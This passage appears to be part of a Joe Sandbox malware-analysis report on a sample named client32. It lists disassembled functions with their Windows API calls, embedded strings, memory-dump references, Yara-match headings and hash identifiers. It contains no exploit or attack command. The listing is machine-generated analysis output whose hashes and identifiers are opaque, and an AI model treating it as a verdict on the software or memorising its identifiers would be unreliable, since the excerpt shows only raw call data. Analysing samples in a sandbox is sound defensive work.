                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                • API String ID: 75970324-4264523126
                                                                                • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 1103F466
                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                • IsWindow.USER32(00000000), ref: 1103F484
                                                                                • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Find$Sleep
                                                                                • String ID: PCIVideoSlave32
                                                                                • API String ID: 2137649973-2496367574
                                                                                • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 4241058051-934300333
                                                                                • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                • _strncat.LIBCMT ref: 1102577B
                                                                                • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                                • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                                • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                • SetFocus.USER32(?), ref: 11025855
                                                                                  • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                • String ID:
                                                                                • API String ID: 3832070631-0
                                                                                • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                • String ID:
                                                                                • API String ID: 3489003387-0
                                                                                • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                Function 11143820 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1114382B
                                                                                • GetSubMenu.USER32(?,00000000), ref: 11143848
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 11143869
                                                                                • GetMenuItemID.USER32(?,00000001), ref: 11143872
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 1114387C
                                                                                • DeleteMenu.USER32(?,00000001,00000400), ref: 11143892
                                                                                • GetMenuItemID.USER32(?,00000001), ref: 1114389A
                                                                                • DeleteMenu.USER32(?,-00000001,00000400), ref: 111438B1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Item$Delete$Count
                                                                                • String ID:
                                                                                • API String ID: 1985338998-0
                                                                                • Opcode ID: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                • Instruction ID: 1fd4eba2895a352ce9ef292ca712417bb50dbed27225d5083b87c16346d81a74
                                                                                • Opcode Fuzzy Hash: c97f0512c627da812fff9da4634e6cbe95e36318860c0e1331f9727aaf39abe5
                                                                                • Instruction Fuzzy Hash: 7611817181422BBBF7059B60CDC8AAFF7BCEF45A19F204229F92592440E7749544CBA1
                                                                                Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                  • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                                • GetParent.USER32(00000000), ref: 11089996
                                                                                • GetParent.USER32(00000000), ref: 110899A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ParentWindow
                                                                                • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                • API String ID: 3530579756-3361795001
                                                                                • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                                • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                                • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                                Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,1B702977,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 1101B776
                                                                                • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                  • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                Strings
                                                                                • NSSecurity.dll, xrefs: 1101B7A3
                                                                                • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                • API String ID: 3515807602-1044166025
                                                                                • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,1B702977,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071824
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
